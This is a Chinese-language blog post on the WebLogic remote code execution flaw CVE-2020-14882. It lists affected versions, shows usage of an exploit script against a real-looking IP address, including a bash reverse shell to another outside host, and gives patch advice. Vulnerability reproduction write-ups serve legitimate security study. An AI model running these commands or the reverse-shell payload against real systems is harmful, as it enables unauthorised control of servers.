栏目分类:
子分类:
返回
名师互学网用户登录
快速导航关闭
当前搜索
当前分类
子分类
实用工具
热门搜索
名师互学网 > IT > 软件开发 > 后端开发 > Python

weblogic 远程代码执行 (CVE-2020-14882)

Python 更新时间: 发布时间: IT归档 最新发布 模块sitemap 名妆网 法律咨询 聚返吧 英语巴士网 伯小乐 网商动力

weblogic 远程代码执行 (CVE-2020-14882)

weblogic 远程代码执行 (CVE-2020-14882)
  • weblogic 远程代码执行 (CVE-2020-14882)
    • 0x01 漏洞描述
    • 0x02 影响范围
    • 0x03 漏洞复现
      • 工具
    • 0x04 漏洞修复

weblogic 远程代码执行 (CVE-2020-14882) 0x01 漏洞描述

Oracle WebLogic Server是美国甲骨文(Oracle)公司的一款适用于云环境和传统环境的应用服务中间件,它提供了一个现代轻型开发平台,支持应用从开发到生产的整个生命周期管理,并简化了应用的部署和管理。 远程攻击者可以通过发送恶意的HTTP GET 请求。成功利用此漏洞的攻击者可在未经身份验证的情况下控制 WebLogic Server Console ,并执行任意代码。

0x02 影响范围

Oracle Weblogic Server 10.3.6.0.0
Oracle Weblogic Server 12.1.3.0.0
Oracle Weblogic Server 12.2.1.3.0
Oracle Weblogic Server 12.2.1.4.0
Oracle Weblogic Server 14.1.1.0.0

0x03 漏洞复现 工具

cve-2020-14882_rce.py
python3 使用

查看用法

python cve-2020-14882_rce.py

whoami

python cve-2020-14882_rce.py -u  http://118.193.36.37:44924 -c whoami

ls /tmp
python cve-2020-14882_rce.py -u http://118.193.36.37:44924 -c “ls /tmp”

反弹shell

python cve-2020-14882_rce.py -u  http://118.193.36.37:44924 -c "bash -i >& /dev/tcp/119.29.67.4/9897 0>&1"

虽然显示漏洞检查失败 但是执行成功

0x04 漏洞修复

安装官方最新补丁进行升级:
https://www.oracle.com/security-alerts

由于该漏洞的补丁存在被绕过的风险,建议临时关闭后台/console/console.portal对外访问。

转载请注明:文章转载自 www.mshxw.com
本文地址:https://www.mshxw.com/it/423636.html
我们一直用心在做
关于我们 文章归档 网站地图 联系我们

版权所有 (c)2021-2022 MSHXW.COM

ICP备案号:晋ICP备2021003244-6号